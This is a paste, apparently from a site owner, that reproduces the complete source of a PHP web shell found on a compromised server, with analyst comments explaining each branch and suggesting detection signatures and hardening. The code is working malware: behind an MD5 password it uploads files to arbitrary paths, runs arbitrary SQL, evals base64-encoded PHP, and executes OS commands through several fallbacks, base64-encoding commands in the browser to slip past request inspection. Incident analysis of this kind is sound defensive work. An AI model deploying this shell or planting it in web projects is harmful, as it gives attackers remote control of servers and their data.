
Malware found on one of my systems

LightningRurik May 16th, 2011 348 Never
  1. error_reporting(E_ERROR | E_WARNING | E_PARSE); // Analyst note: start of a password-gated PHP web shell; the comments in this listing are defender annotations.
     // display_errors is switched off next, so runtime failures inside the shell
     // produce nothing visible in the response.
  2. ini_set('display_errors', "0");
  3.  
     // A non-empty POST field "p" is copied into $_COOKIE for this request and set as a
     // cookie named "p" for one hour, so the password is typed once and then replayed by
     // the browser. It travels unhashed in the POST body and afterwards in the Cookie header.
  4. if ($_POST["p"] != "") {
  5.         $_COOKIE["p"] = $_POST["p"];
  6.         setcookie("p", $_POST["p"], time() + 3600);
  7. }
  8.  
     // Gate: unless the MD5 of cookie "p" equals the hard-coded digest, only a bare
     // one-field form is printed and the script exits. Unsalted MD5 of a single shared
     // password is the only access control in the file.
     // Detection: the digest literal is a stable string to search for across web roots,
     // and the unlabeled form (text field "p", submit button B_SUBMIT with value 'Check')
     // is what an unauthenticated request to the file returns.
  9. if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") {
  10.         echo "<form method=post>";
  11.         echo "<input type=text name=p value='' size=50>";
  12.         echo "<input type=submit name=B_SUBMIT value='Check'>";
  13.         echo "</form>";
  14.         exit;
  15. }
  16.  
  17. if ($_POST["action"] == "upload") {
      // Dispatcher for authenticated requests: POST "action" selects upload, sql or runphp;
      // anything else falls through to the OS command console in the final else branch.
      //
      // upload: the temp file from form field "filepath" is moved to the caller-supplied
      // "newpath" with no check on file name, type or destination, so it can land anywhere
      // the PHP process may write. "done" is printed whether or not the move succeeded.
      // Incident response: list files created or modified around the times this script was
      // requested, inside and outside the web root.
  18.  
  19.     $l=$_FILES["filepath"]["tmp_name"];
  20.     $newpath=$_POST["newpath"];
  21.     if ($newpath!="") move_uploaded_file($l,$newpath);
  22.     echo "done";
  23.  
  24.  
      // sql: connects with the host, user, password and database named in the request and
      // runs the posted query verbatim. No result set is read back; the response is only
      // "done" plus the query text, echoed without HTML escaping. The str_replace turns \'
      // back into ' (presumably undoing magic_quotes_gpc escaping; confirm on the host).
      // The mysql_* functions were removed in PHP 7, so this branch fails on current PHP.
      // An operator using this branch already holds working database credentials, so the
      // site's database accounts should be rotated.
  25. } else if ($_POST["action"] == "sql") {
  26.  
  27.     $query = $_POST["query"];
  28.     $query = str_replace("\'","'",$query);
  29.     $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or di
  30. e ('Not connected : ' . mysql_error());
  31.     mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());
  32.     mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());
  33.     mysql_close($lnk);
  34.     echo "done<br><pre>$query</pre>";
  35.  
      // runphp: POST "cmd" is base64-decoded and handed to eval(), i.e. arbitrary PHP runs
      // with the web server's privileges. Because the body is base64, plain-text matching on
      // request bodies sees nothing; scanning source files for eval(base64_decode( applied
      // to request data finds this line.
  36. } else if ($_POST["action"] == "runphp") {
  37.  
  38.     eval(base64_decode($_POST["cmd"]));
  39.  
  40. } else {
  41.  
      // Default branch: reads the disable_functions setting and splits it into an array of
      // names (spaces stripped), or an empty array when nothing is disabled. myshellexec()
      // below consults this list before picking an execution function.
  42.     $disablefunc = @ini_get("disable_functions");
  43.     if (!empty($disablefunc)) {
  44.         $disablefunc = str_replace(" ","",$disablefunc);
  45.         $disablefunc = explode(",",$disablefunc);
  46.     } else $disablefunc = array();
  47.  
  48.  
  49.     function myshellexec($cmd) {
          // Runs $cmd as an OS command and returns its output as a string ("" for an empty
          // command). Tries, in order: exec(), the backtick operator (shell_exec), system(),
          // passthru(), popen(). exec/system/passthru are skipped when not callable or when
          // named in $disablefunc; the backtick and popen attempts are not checked against
          // that list. Every call is prefixed with @, so failures are silent.
          // Hardening: a disable_functions value that omits any of exec, shell_exec, system,
          // passthru or popen leaves this helper a working path.
  50.         global $disablefunc;
  51.         $result = "";
  52.         if (!empty($cmd)) {
  53.             if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec(
  54. $cmd,$result); $result = @join("\n",$result);}
  55.             elseif (($result = `$cmd`) !== FALSE) {}
              // system() and passthru() print directly, so the current output buffer is saved
              // in $v and cleared, the command output is read back from the buffer, and $v is
              // echoed again afterwards.
  56.             elseif (is_callable("system") and !@in_array("system",$disablefunc))
  57.  {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_content
  58. s(); @ob_clean(); echo $v;}
  59.             elseif (is_callable("passthru") and !@in_array("passthru",$disablefu
  60. nc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_c
  61. ontents(); @ob_clean(); echo $v;}
  62.             elseif (is_resource($fp = @popen($cmd,"r"))) {
  63.                 $result = "";
  64.                 while(!feof($fp)) {$result .= @fread($fp,1024);}
  65.                 @pclose($fp);
  66.             }
  67.         }
  68.         return $result;
  69.     }
  70.         $cmd = stripslashes($_POST["cmd"]);
          // The command arrives either in clear text (POST "cmd") or, when POST "enc" is 1,
          // as base64 in POST "cmd_enc". The form printed further down always takes the
          // encoded path when its script runs, so a typical request carries an empty cmd,
          // enc=1 and a base64 cmd_enc.
          // Detection: where request bodies are inspected or logged, that parameter
          // combination is the pattern to match; default access logs do not record POST
          // bodies, so repeated POSTs to one unexpected script are the usual log evidence.
  71.         $cmd_enc = stripslashes($_POST["cmd_enc"]);
  72.  
  73.         if ($_POST["enc"]==1){
  74.                 $cmd=base64_decode($cmd_enc);
  75.         }
  76.         ?>
  77. <script language=javascript type="text/javascript">
  78. <!--
  79. var END_OF_INPUT = -1; // sentinel that readBase64() returns once the input is used up
      // base64Chars is the standard base64 alphabet (A-Z, a-z, 0-9, +, /), indexed by
      // 6-bit value.
  80. var base64Chars = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M',
  81. 'N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g',
  82. 'h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0',
  83. '1','2','3','4','5','6','7','8','9','+','/');
      // reverseBase64Chars maps each alphabet character back to its value; nothing in this
      // listing reads it.
  84. var reverseBase64Chars = new Array();
  85. for (var i=0; i < base64Chars.length; i++){
  86.     reverseBase64Chars[base64Chars[i]] = i;
  87. }
      // Cursor state shared by setBase64Str() and readBase64().
  88. var base64Str;
  89. var base64Count;
  90. function setBase64Str(str){
      // Loads str as the string to encode and rewinds the shared read cursor to its start.
  91.     base64Str = str;
  92.     base64Count = 0;
  93. }
  94. function readBase64(){
      // Returns the next character code of base64Str masked to its low 8 bits, or
      // END_OF_INPUT when the string is unset/empty or fully consumed. Because of the
      // mask, characters above U+00FF are truncated to one byte, not UTF-8 encoded.
  95.     if (!base64Str) return END_OF_INPUT;
  96.  
  97.     if (base64Count >= base64Str.length) return END_OF_INPUT;
  98.     var c = base64Str.charCodeAt(base64Count) & 0xff;
  99.     base64Count++;
  100.     return c;
  101. }
  102. function encodeBase64(str){
       // Base64-encodes str and returns the encoded text. Input is read three bytes at a
       // time through readBase64() and emitted as four alphabet characters; a final group
       // of one or two bytes is padded with '=' and ends the loop. A '\n' is appended after
       // every 76 output characters, so long encoded values contain line breaks.
  103.     setBase64Str(str);
  104.     var result = '';
  105.     var inBuffer = new Array(3);
  106.     var lineCount = 0;
  107.     var done = false;
  108.     while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){
  109.         inBuffer[1] = readBase64();
  110.         inBuffer[2] = readBase64();
           // First output character: top six bits of byte 0.
  111.         result += (base64Chars[ inBuffer[0] >> 2 ]);
  112.         if (inBuffer[1] != END_OF_INPUT){
  113.             result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1]
  114.  >> 4) ]);
  115.             if (inBuffer[2] != END_OF_INPUT){
  116.                 result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[
  117. 2] >> 6) ]);
  118.                 result += (base64Chars [inBuffer[2] & 0x3F]);
  119.             } else {
  120.  
                   // Two input bytes left: three characters plus one '=' pad.
  121.                 result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);
  122.                 result += ('=');
  123.                 done = true;
  124.             }
  125.         } else {
               // One input byte left: two characters plus two '=' pads.
  126.             result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);
  127.             result += ('=');
  128.             result += ('=');
  129.             done = true;
  130.         }
  131.         lineCount += 4;
  132.         if (lineCount >= 76){
  133.             result += ('\n');
  134.             lineCount = 0;
  135.         }
  136.     }
  137.     return result;
  138. }
  139. function encodeIt(f){
           // onSubmit handler for the command form f: stores the base64 of the typed command
           // in the hidden cmd_enc field, blanks the visible cmd field, sets enc to 1 and
           // submits. The request body therefore carries the command only in base64, which
           // plain-text rules on request bodies will not match. `l` is assigned without var
           // and so becomes a global.
  140.         l=encodeBase64(f.cmd.value);
  141.         f.cmd_enc.value=l;
  142.         f.cmd.value="";
  143.         f.enc.value=1;
  144.  
  145.         f.submit();
  146. }
  147. //--></script>
  148.         <?
           // Short open tag: PHP parses what follows only when short_open_tag is enabled.
           // Prints the command form. Its onSubmit handler, encodeIt(), replaces the typed
           // command with its base64 form before the request is sent. The previous command
           // is echoed back into the text field with only double quotes escaped.
  149.  
  150.     echo "<form method=post action='' onSubmit='encodeIt(this);return false;'>";
  151.  
  152.     echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\
  153. " size=150>";
  154.    echo "<input type=hidden name=enc value='0'>";
  155.    echo "<input type=hidden name=cmd_enc value=''>";
  156.    echo "<input type=submit name=B_SUBMIT value='Go'>";
  157.    echo "</form>";
          // When a command is present, the response carries the literal text "Executing "
          // followed by the command and then its output from myshellexec(), all inside a
          // pre element, and the script exits. Where response bodies are inspected or
          // captured, that literal prefix is a usable signature.
  158.    if ($cmd != "") {
  159.        echo "<pre>";
  160.        $cmd=stripslashes($cmd);
  161.        echo "Executing $cmd \n";
  162.        echo myshellexec("$cmd");
  163.        echo "</pre>";
  164.        exit;
  165.    }
  166. }